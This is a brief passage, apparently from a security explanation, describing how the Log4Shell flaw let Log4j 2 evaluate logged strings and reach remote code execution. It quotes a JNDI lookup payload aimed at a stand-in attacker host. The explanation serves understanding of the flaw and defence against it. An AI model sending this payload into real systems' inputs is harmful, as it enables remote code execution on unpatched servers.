${jndi:ldap://attacker.com/a} JNDI lookup — is passed to the logging framework. If the logging framework evaluates the string (as Log4j 2 did before the Log4Shell patch), it initiates a server-side DNS lookup or class load — enabling RCE. The payload arrived through a trusted channel; the logging layer had no reason to sanitize it.